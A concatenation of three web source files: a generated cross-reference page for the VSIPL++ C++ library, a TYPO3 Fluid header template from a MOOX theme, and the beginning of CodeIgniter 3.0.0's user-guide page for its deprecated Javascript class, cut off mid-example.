href="../Scopes/vsip/impl/realtocomplex_functor.html">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/complex.hpp.html#89">vsip/complex.hpp:89</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> <li>Declarations: <ul> <li><a href="../Source/vsip/complex.hpp.html#91">vsip/complex.hpp:91</a>: Typedef <a href="../Scopes/vsip/impl/realtocomplex_functor.html#result_type">result_type</a></li><li><a href="../Source/vsip/complex.hpp.html#92">vsip/complex.hpp:92</a>: Member function <a href="../Scopes/vsip/impl/realtocomplex_functor.html#name_l_r">name&#40;&#41;</a></li><li><a href="../Source/vsip/complex.hpp.html#93">vsip/complex.hpp:93</a>: Member function <a href="../Scopes/vsip/impl/realtocomplex_functor.html#apply_lT_r">apply&#40;T&#41;</a></li><li><a href="../Source/vsip/complex.hpp.html#94">vsip/complex.hpp:94</a>: Member function <a href="../Scopes/vsip/impl/realtocomplex_functor.html#operator_l_r_lT_rconst">operator&#40;&#41;&#40;T&#41;const</a></li></ul> </li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrealtocomplex_functor_mapply_lT_r"></a><h2>Member function vsip::impl::realtocomplex_functor::apply&#40;T&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/realtocomplex_functor.html#apply_lT_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/complex.hpp.html#93">vsip/complex.hpp:93</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> <li>Called from: <ul> <li><a href="../Source/vsip/complex.hpp.html#94">vsip/complex.hpp:94</a>: in member function <a href="../Scopes/vsip/impl/realtocomplex_functor.html#operator_l_r_lT_rconst">vsip::impl::realtocomplex_functor::operator&#40;&#41;&#40;T&#41;const</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrealtocomplex_functor_mname_l_r"></a><h2>Member function vsip::impl::realtocomplex_functor::name&#40;&#41;</h2><ul> <li><a href="../Scopes/vsip/impl/realtocomplex_functor.html#name_l_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/complex.hpp.html#92">vsip/complex.hpp:92</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrealtocomplex_functor_moperator_l_r_lT_rconst"></a><h2>Member function vsip::impl::realtocomplex_functor::operator&#40;&#41;&#40;T&#41;const</h2><ul> <li><a href="../Scopes/vsip/impl/realtocomplex_functor.html#operator_l_r_lT_rconst">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/complex.hpp.html#94">vsip/complex.hpp:94</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrealtocomplex_functor_mresult_type"></a><h2>Typedef vsip::impl::realtocomplex_functor::result_type</h2><ul> <li><a href="../Scopes/vsip/impl/realtocomplex_functor.html#result_type">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/complex.hpp.html#91">vsip/complex.hpp:91</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> <li>Referenced from: <ul> <li><a href="../Source/vsip/complex.hpp.html#93">vsip/complex.hpp:93</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> <li><a href="../Source/vsip/complex.hpp.html#94">vsip/complex.hpp:94</a>: in struct <a href="../Scopes/vsip/impl/realtocomplex_functor.html">vsip::impl::realtocomplex_functor</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrecv_lCommunicator_A_cprocessor_type_cMatrix_LT_cBlock_R_r"></a><h2>Function template vsip::impl::recv&#40;Communicator&amp;&#44;processor_type&#44;Matrix&lt;T&#44;Block&gt;&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#recv_lCommunicator_A_cprocessor_type_cMatrix_LT_cBlock_R_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/util.hpp.html#191">vsip/core/parallel/util.hpp:191</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrecv_lCommunicator_A_cprocessor_type_cT_S_clength_type_r"></a><h2>Function template vsip::impl::recv&#40;Communicator&amp;&#44;processor_type&#44;T*&#44;length_type&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#recv_lCommunicator_A_cprocessor_type_cT_S_clength_type_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/assign_block_vector.hpp.html#299">vsip/core/parallel/assign_block_vector.hpp:299</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div><div class="xref-name"><a id="vsip_mimpl_mrecv_lCommunicator_A_cprocessor_type_cVector_LT_cBlock_R_r"></a><h2>Function template vsip::impl::recv&#40;Communicator&amp;&#44;processor_type&#44;Vector&lt;T&#44;Block&gt;&#41;</h2><ul> <li><a href="../Scopes/vsip/impl.html#recv_lCommunicator_A_cprocessor_type_cVector_LT_cBlock_R_r">Documentation</a></li><li>Defined at: <ul> <li><a href="../Source/vsip/core/parallel/util.hpp.html#171">vsip/core/parallel/util.hpp:171</a>: in using namespace <a href="../Scopes/vsip/impl.html">vsip::impl</a></li> </ul></li> </ul> </div> <div class="logo">Generated on Sat Apr 17 11:15:14 2010 by <br/> <a href="http://synopsis.fresco.org" target="_blank"><img src="../synopsis.png" alt="logo"/> synopsis</a> (version 0.12)</div> </body> </html>
Resources/Private/Partials/MooxHeaderSecond.html
dcngmbh/moox_template_free001
{namespace v=FluidTYPO3\Vhs\ViewHelpers} <div xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:v="http://fedext.net/ns/vhs/ViewHelpers" xmlns:f="http://typo3.org/ns/fluid/ViewHelpers"> <f:section name="MooxDefaultHeaderSection"> <div class="sticky-row"> <header id="page-header" class="header-style2"> <v:page.menu entryLevel="{settings.entryLevel}" useShortcutUid="FALSE" useShortcutData="FALSE"> <nav class="navbar navbar-default" role="navigation"> <div class="container"> <f:render partial="MooxSuperfishNavigation" section="MooxNavigation" arguments="{_all}" /> </div> </nav> </v:page.menu> <div class="header-container container"> <f:render section="MooxHeaderTopPart" arguments="{_all}" /> </div> </header> </div> </f:section> <f:section name="MooxCenterHeaderSection"> <div class="sticky-row"> <header id="page-header" class="header-style2"> <v:page.menu entryLevel="{settings.entryLevel}" useShortcutUid="FALSE" useShortcutData="FALSE"> <nav class="navbar navbar-default" role="navigation"> <f:render partial="MooxSuperfishNavigation" section="MooxNavigation" arguments="{_all}" /> </nav> </v:page.menu> <div class="header-container container-fluid"> <f:render section="MooxHeaderTopPart" arguments="{_all}" /> </div> </header> </div> </f:section> <f:section name="MooxFullHeaderSection"> <div class="sticky-row"> <header id="page-header" class="header-style2"> <v:page.menu entryLevel="{settings.entryLevel}" useShortcutUid="FALSE" useShortcutData="FALSE"> <nav class="navbar navbar-default" role="navigation"> <div class="container-fluid"> <f:render partial="MooxSuperfishNavigation" section="MooxNavigation" arguments="{_all}" /> </div> </nav> </v:page.menu> <div class="header-container container-fluid"> <f:render section="MooxHeaderTopPart" arguments="{_all}" /> </div> </header> </div> </f:section> <f:section name="MooxHeaderTopPart"> <div class="row"> <div class="col-sm-4 col-xs-12"> <f:render partial="MooxLogo" section="MooxLogoSection" arguments="{_all}" /> </div> <div class="col-sm-8 col-xs-12"> <f:render partial="MooxLanguage" section="MooxLanguageSection" arguments="{_all}" /> <f:if condition="{settings.headerMenuEnable}"> <div class="header-menu-section pull-left"> <v:page.menu pageUid="{settings.headerMenuPageUid}" class="pull-right" useShortcutUid="FALSE" useShortcutData="FALSE"> <f:render partial="MooxSimpleMetaNavigation" section="MooxNavigation" arguments="{_all}" /> </v:page.menu> </div> </f:if> </div> </div> </f:section> </div>
user_guide/libraries/javascript.html
maellakhua/museum_guide_server
<<<<<<< HEAD <!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Javascript Class &mdash; CodeIgniter 3.0.0 documentation</title> <link rel="shortcut icon" href="../_static/ci-icon.ico"/> <link href='https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic|Roboto+Slab:400,700|Inconsolata:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="../_static/css/theme.css" type="text/css" /> <link rel="top" title="CodeIgniter 3.0.0 documentation" href="../index.html"/> <link rel="up" title="Libraries" href="index.html"/> <link rel="next" title="Language Class" href="language.html"/> <link rel="prev" title="Input Class" href="input.html"/> <script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js"></script> </head> <body class="wy-body-for-nav" role="document"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-nav-search"> <a href="../index.html" class="fa fa-home"> CodeIgniter</a> <div role="search"> <form id="rtd-search-form" class="wy-form" action="../search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul> <li class="toctree-l1"><a class="reference internal" href="../general/welcome.html">Welcome to CodeIgniter</a><ul class="simple"> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../installation/index.html">Installation Instructions</a><ul> <li class="toctree-l2"><a class="reference internal" href="../installation/downloads.html">Downloading CodeIgniter</a></li> <li class="toctree-l2"><a class="reference internal" href="../installation/index.html">Installation Instructions</a></li> <li class="toctree-l2"><a class="reference internal" href="../installation/upgrading.html">Upgrading From a Previous Version</a></li> <li class="toctree-l2"><a class="reference internal" href="../installation/troubleshooting.html">Troubleshooting</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../overview/index.html">CodeIgniter Overview</a><ul> <li class="toctree-l2"><a class="reference internal" href="../overview/getting_started.html">Getting Started</a></li> <li class="toctree-l2"><a class="reference internal" href="../overview/at_a_glance.html">CodeIgniter at a Glance</a></li> <li class="toctree-l2"><a class="reference internal" href="../overview/features.html">Supported Features</a></li> <li class="toctree-l2"><a class="reference internal" href="../overview/appflow.html">Application Flow Chart</a></li> <li class="toctree-l2"><a class="reference internal" href="../overview/mvc.html">Model-View-Controller</a></li> <li class="toctree-l2"><a class="reference internal" href="../overview/goals.html">Architectural Goals</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../tutorial/index.html">Tutorial</a><ul> <li class="toctree-l2"><a class="reference internal" href="../tutorial/static_pages.html">Static pages</a></li> <li class="toctree-l2"><a class="reference internal" href="../tutorial/news_section.html">News section</a></li> <li class="toctree-l2"><a class="reference internal" href="../tutorial/create_news_items.html">Create news items</a></li> <li class="toctree-l2"><a class="reference internal" href="../tutorial/conclusion.html">Conclusion</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../general/index.html">General Topics</a><ul> <li class="toctree-l2"><a class="reference internal" href="../general/urls.html">CodeIgniter URLs</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/controllers.html">Controllers</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/reserved_names.html">Reserved Names</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/views.html">Views</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/models.html">Models</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/helpers.html">Helpers</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/libraries.html">Using CodeIgniter Libraries</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/creating_libraries.html">Creating Libraries</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/drivers.html">Using CodeIgniter Drivers</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/creating_drivers.html">Creating Drivers</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/core_classes.html">Creating Core System Classes</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/ancillary_classes.html">Creating Ancillary Classes</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/hooks.html">Hooks - Extending the Framework Core</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/autoloader.html">Auto-loading Resources</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/common_functions.html">Common Functions</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/compatibility_functions.html">Compatibility Functions</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/routing.html">URI Routing</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/errors.html">Error Handling</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/caching.html">Caching</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/profiling.html">Profiling Your Application</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/cli.html">Running via the CLI</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/managing_apps.html">Managing your Applications</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/environments.html">Handling Multiple Environments</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/alternative_php.html">Alternate PHP Syntax for View Files</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/security.html">Security</a></li> <li class="toctree-l2"><a class="reference internal" href="../general/styleguide.html">PHP Style Guide</a></li> </ul> </li> </ul> <ul class="current"> <li class="toctree-l1 current"><a class="reference internal" href="index.html">Libraries</a><ul class="current"> <li class="toctree-l2"><a class="reference internal" href="benchmark.html">Benchmarking Class</a></li> <li class="toctree-l2"><a class="reference internal" href="caching.html">Caching Driver</a></li> <li class="toctree-l2"><a class="reference internal" href="calendar.html">Calendaring Class</a></li> <li class="toctree-l2"><a class="reference internal" href="cart.html">Shopping Cart Class</a></li> <li class="toctree-l2"><a class="reference internal" href="config.html">Config Class</a></li> <li class="toctree-l2"><a class="reference internal" href="email.html">Email Class</a></li> <li class="toctree-l2"><a class="reference internal" href="encrypt.html">Encrypt Class</a></li> <li class="toctree-l2"><a class="reference internal" href="encryption.html">Encryption Library</a></li> <li class="toctree-l2"><a class="reference internal" href="file_uploading.html">File Uploading Class</a></li> <li class="toctree-l2"><a class="reference internal" href="form_validation.html">Form Validation</a></li> <li class="toctree-l2"><a class="reference internal" href="ftp.html">FTP Class</a></li> <li class="toctree-l2"><a class="reference internal" href="image_lib.html">Image Manipulation Class</a></li> <li class="toctree-l2"><a class="reference internal" href="input.html">Input Class</a></li> <li class="toctree-l2 current"><a class="current reference internal" href="">Javascript Class</a></li> <li class="toctree-l2"><a class="reference internal" href="language.html">Language Class</a></li> <li class="toctree-l2"><a class="reference internal" href="loader.html">Loader Class</a></li> <li class="toctree-l2"><a class="reference internal" href="migration.html">Migrations Class</a></li> <li class="toctree-l2"><a class="reference internal" href="output.html">Output Class</a></li> <li class="toctree-l2"><a class="reference internal" href="pagination.html">Pagination Class</a></li> <li class="toctree-l2"><a class="reference internal" href="parser.html">Template Parser Class</a></li> <li class="toctree-l2"><a class="reference internal" href="security.html">Security Class</a></li> <li class="toctree-l2"><a class="reference internal" href="sessions.html">Session Library</a></li> <li class="toctree-l2"><a class="reference internal" href="table.html">HTML Table Class</a></li> <li class="toctree-l2"><a class="reference internal" href="trackback.html">Trackback Class</a></li> <li class="toctree-l2"><a class="reference internal" href="typography.html">Typography Class</a></li> <li class="toctree-l2"><a class="reference internal" href="unit_testing.html">Unit Testing Class</a></li> <li class="toctree-l2"><a class="reference internal" href="uri.html">URI Class</a></li> <li class="toctree-l2"><a class="reference internal" href="user_agent.html">User Agent Class</a></li> <li class="toctree-l2"><a class="reference internal" href="xmlrpc.html">XML-RPC and XML-RPC Server Classes</a></li> <li class="toctree-l2"><a class="reference internal" href="zip.html">Zip Encoding Class</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../database/index.html">Database Reference</a><ul> <li class="toctree-l2"><a class="reference internal" href="../database/examples.html">Quick Start: Usage Examples</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/configuration.html">Database Configuration</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/connecting.html">Connecting to a Database</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/queries.html">Running Queries</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/results.html">Generating Query Results</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/helpers.html">Query Helper Functions</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/query_builder.html">Query Builder Class</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/transactions.html">Transactions</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/metadata.html">Getting MetaData</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/call_function.html">Custom Function Calls</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/caching.html">Query Caching</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/forge.html">Database Manipulation with Database Forge</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/utilities.html">Database Utilities Class</a></li> <li class="toctree-l2"><a class="reference internal" href="../database/db_driver_reference.html">Database Driver Reference</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../helpers/index.html">Helpers</a><ul> <li class="toctree-l2"><a class="reference internal" href="../helpers/array_helper.html">Array Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/captcha_helper.html">CAPTCHA Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/cookie_helper.html">Cookie Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/date_helper.html">Date Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/directory_helper.html">Directory Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/download_helper.html">Download Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/email_helper.html">Email Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/file_helper.html">File Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/form_helper.html">Form Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/html_helper.html">HTML Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/inflector_helper.html">Inflector Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/language_helper.html">Language Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/number_helper.html">Number Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/path_helper.html">Path Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/security_helper.html">Security Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/smiley_helper.html">Smiley Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/string_helper.html">String Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/text_helper.html">Text Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/typography_helper.html">Typography Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/url_helper.html">URL Helper</a></li> <li class="toctree-l2"><a class="reference internal" href="../helpers/xml_helper.html">XML Helper</a></li> </ul> </li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../contributing/index.html">Contributing to CodeIgniter</a><ul> <li class="toctree-l2"><a class="reference internal" href="../documentation/index.html">Writing CodeIgniter Documentation</a></li> <li class="toctree-l2"><a class="reference internal" href="../DCO.html">Developer&#8217;s Certificate of Origin 1.1</a></li> </ul> </li> </ul> </div> &nbsp; </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" role="navigation" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="../index.html">CodeIgniter</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="../index.html">Docs</a> &raquo;</li> <li><a href="index.html">Libraries</a> &raquo;</li> <li>Javascript Class</li> <li class="wy-breadcrumbs-aside"> </li> </ul> <hr/> </div> <div role="main" class="document"> <div class="section" id="javascript-class"> <h1>Javascript Class<a class="headerlink" href="#javascript-class" title="Permalink to this headline">¶</a></h1> <p>CodeIgniter provides a library to help you with certain common functions that you may want to use with Javascript. Please note that CodeIgniter does not require the jQuery library to run, and that any scripting library will work equally well. The jQuery library is simply presented as a convenience if you choose to use it.</p> <div class="admonition important"> <p class="first admonition-title">Important</p> <p class="last">This library is DEPRECATED and should not be used. It has always been with an &#8216;experimental&#8217; status and is now no longer supported. Currently only kept for backwards compatibility.</p> </div> <div class="contents local topic" id="contents"> <ul class="simple"> <li><a class="reference internal" href="#using-the-javascript-class" id="id3">Using the Javascript Class</a><ul> <li><a class="reference internal" href="#initializing-the-class" id="id4">Initializing the Class</a></li> <li><a class="reference internal" href="#setup-and-configuration" id="id5">Setup and Configuration</a><ul> <li><a class="reference internal" href="#set-these-variables-in-your-view" id="id6">Set these variables in your view</a></li> <li><a class="reference internal" href="#set-the-path-to-the-librarys-with-config-items" id="id7">Set the path to the librarys with config items</a></li> </ul> </li> <li><a class="reference internal" href="#the-jquery-class" id="id8">The jQuery Class</a></li> <li><a class="reference internal" href="#jquery-events" id="id9">jQuery Events</a></li> <li><a class="reference internal" href="#effects" id="id10">Effects</a><ul> <li><a class="reference internal" href="#hide-show" id="id11">hide() / show()</a></li> <li><a class="reference internal" href="#toggle" id="id12">toggle()</a></li> <li><a class="reference internal" href="#animate" id="id13">animate()</a></li> <li><a class="reference internal" href="#fadein-fadeout" id="id14">fadeIn() / fadeOut()</a></li> <li><a class="reference internal" href="#toggleclass" id="id15">toggleClass()</a></li> <li><a class="reference internal" href="#id2" id="id16">fadeIn() / fadeOut()</a></li> <li><a class="reference internal" href="#slideup-slidedown-slidetoggle" id="id17">slideUp() / slideDown() / slideToggle()</a></li> </ul> </li> <li><a class="reference internal" href="#plugins" id="id18">Plugins</a><ul> <li><a class="reference internal" href="#corner" id="id19">corner()</a></li> <li><a class="reference internal" href="#tablesorter" id="id20">tablesorter()</a></li> <li><a class="reference internal" href="#modal" id="id21">modal()</a></li> <li><a class="reference internal" href="#calendar" id="id22">calendar()</a></li> </ul> </li> </ul> </li> </ul> </div> <div class="custom-index container"></div><div class="section" id="using-the-javascript-class"> <h2><a class="toc-backref" href="#id3">Using the Javascript Class</a><a class="headerlink" href="#using-the-javascript-class" title="Permalink to this headline">¶</a></h2> <div class="section" id="initializing-the-class"> <h3><a class="toc-backref" href="#id4">Initializing the Class</a><a class="headerlink" href="#initializing-the-class" title="Permalink to this headline">¶</a></h3> <p>To initialize the Javascript class manually in your controller constructor, use the <tt class="docutils literal"><span class="pre">$this-&gt;load-&gt;library()</span></tt> method. Currently, the only available library is jQuery, which will automatically be loaded like this:</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">load</span><span class="o">-&gt;</span><span class="na">library</span><span class="p">(</span><span class="s1">&#39;javascript&#39;</span><span class="p">);</span> </pre></div> </div> <p>The Javascript class also accepts parameters:</p> <ul class="simple"> <li>js_library_driver (string) <em>default: &#8216;jquery&#8217;</em></li> <li>autoload (bool) <em>default: TRUE</em></li> </ul> <p>You may override the defaults by sending an associative array:</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">load</span><span class="o">-&gt;</span><span class="na">library</span><span class="p">(</span> <span class="s1">&#39;javascript&#39;</span><span class="p">,</span> <span class="k">array</span><span class="p">(</span> <span class="s1">&#39;js_library_driver&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;scripto&#39;</span><span class="p">,</span> <span class="s1">&#39;autoload&#39;</span> <span class="o">=&gt;</span> <span class="k">FALSE</span> <span class="p">)</span> <span class="p">);</span> </pre></div> </div> <p>Again, presently only &#8216;jquery&#8217; is available. You may wish to set autoload to FALSE, though, if you do not want the jQuery library to automatically include a script tag for the main jQuery script file. This is useful if you are loading it from a location outside of CodeIgniter, or already have the script tag in your markup.</p> <p>Once loaded, the jQuery library object will be available using:</p> <blockquote> <div>$this-&gt;javascript</div></blockquote> </div> <div class="section" id="setup-and-configuration"> <h3><a class="toc-backref" href="#id5">Setup and Configuration</a><a class="headerlink" href="#setup-and-configuration" title="Permalink to this headline">¶</a></h3> <div class="section" id="set-these-variables-in-your-view"> <h4><a class="toc-backref" href="#id6">Set these variables in your view</a><a class="headerlink" href="#set-these-variables-in-your-view" title="Permalink to this headline">¶</a></h4> <p>As a Javascript library, your files must be available to your application.</p> <p>As Javascript is a client side language, the library must be able to write content into your final output. This generally means a view. You&#8217;ll need to include the following variables in the <tt class="docutils literal"><span class="pre">&lt;head&gt;</span></tt> sections of your output.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="o">&lt;?</span><span class="nx">php</span> <span class="k">echo</span> <span class="nv">$library_src</span><span class="p">;</span><span class="cp">?&gt;</span> <span class="cp">&lt;?php</span> <span class="k">echo</span> <span class="nv">$script_head</span><span class="p">;</span><span class="cp">?&gt;</span> </pre></div> </div> <p><tt class="docutils literal"><span class="pre">$library_src</span></tt>, is where the actual library file will be loaded, as well as any subsequent plugin script calls; $script_head is where specific events, functions and other commands will be rendered.</p> </div> <div class="section" id="set-the-path-to-the-librarys-with-config-items"> <h4><a class="toc-backref" href="#id7">Set the path to the librarys with config items</a><a class="headerlink" href="#set-the-path-to-the-librarys-with-config-items" title="Permalink to this headline">¶</a></h4> <p>There are some configuration items in Javascript library. These can either be set in <em>application/config.php</em>, within its own <em>config/javascript.php</em> file, or within any controller usings the <tt class="docutils literal"><span class="pre">set_item()</span></tt> function.</p> <p>An image to be used as an &#8220;ajax loader&#8221;, or progress indicator. Without one, the simple text message of &#8220;loading&#8221; will appear when Ajax calls need to be made.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$config</span><span class="p">[</span><span class="s1">&#39;javascript_location&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;http://localhost/codeigniter/themes/js/jquery/&#39;</span><span class="p">;</span> <span class="nv">$config</span><span class="p">[</span><span class="s1">&#39;javascript_ajax_img&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;images/ajax-loader.gif&#39;</span><span class="p">;</span> </pre></div> </div> <p>If you keep your files in the same directories they were downloaded from, then you need not set this configuration items.</p> </div> </div> <div class="section" id="the-jquery-class"> <h3><a class="toc-backref" href="#id8">The jQuery Class</a><a class="headerlink" href="#the-jquery-class" title="Permalink to this headline">¶</a></h3> <p>To initialize the jQuery class manually in your controller constructor, use the <tt class="docutils literal"><span class="pre">$this-&gt;load-&gt;library()</span></tt> method:</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">load</span><span class="o">-&gt;</span><span class="na">library</span><span class="p">(</span><span class="s1">&#39;javascript/jquery&#39;</span><span class="p">);</span> </pre></div> </div> <p>You may send an optional parameter to determine whether or not a script tag for the main jQuery file will be automatically included when loading the library. It will be created by default. To prevent this, load the library as follows:</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">load</span><span class="o">-&gt;</span><span class="na">library</span><span class="p">(</span><span class="s1">&#39;javascript/jquery&#39;</span><span class="p">,</span> <span class="k">FALSE</span><span class="p">);</span> </pre></div> </div> <p>Once loaded, the jQuery library object will be available using:</p> <blockquote> <div>$this-&gt;jquery</div></blockquote> </div> <div class="section" id="jquery-events"> <h3><a class="toc-backref" href="#id9">jQuery Events</a><a class="headerlink" href="#jquery-events" title="Permalink to this headline">¶</a></h3> <p>Events are set using the following syntax.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">event</span><span class="p">(</span><span class="s1">&#39;element_path&#39;</span><span class="p">,</span> <span class="nx">code_to_run</span><span class="p">());</span> </pre></div> </div> <p>In the above example:</p> <ul class="simple"> <li>&#8220;event&#8221; is any of blur, change, click, dblclick, error, focus, hover, keydown, keyup, load, mousedown, mouseup, mouseover, mouseup, resize, scroll, or unload.</li> <li>&#8220;element_path&#8221; is any valid <a class="reference external" href="http://api.jquery.com/category/selectors/">jQuery selector</a>. Due to jQuery&#8217;s unique selector syntax, this is usually an element id, or CSS selector. For example &#8220;#notice_area&#8221; would effect <tt class="docutils literal"><span class="pre">&lt;div</span> <span class="pre">id=&quot;notice_area&quot;&gt;</span></tt>, and &#8220;#content a.notice&#8221; would effect all anchors with a class of &#8220;notice&#8221; in the div with id &#8220;content&#8221;.</li> <li>&#8220;<tt class="docutils literal"><span class="pre">code_to_run()</span></tt>&#8221; is script your write yourself, or an action such as an effect from the jQuery library below.</li> </ul> </div> <div class="section" id="effects"> <h3><a class="toc-backref" href="#id10">Effects</a><a class="headerlink" href="#effects" title="Permalink to this headline">¶</a></h3> <p>The query library supports a powerful <a class="reference external" href="http://api.jquery.com/category/effects/">Effects</a> repertoire. Before an effect can be used, it must be loaded:</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">effect</span><span class="p">([</span><span class="nx">optional</span> <span class="nx">path</span><span class="p">]</span> <span class="nx">plugin</span> <span class="nx">name</span><span class="p">);</span> <span 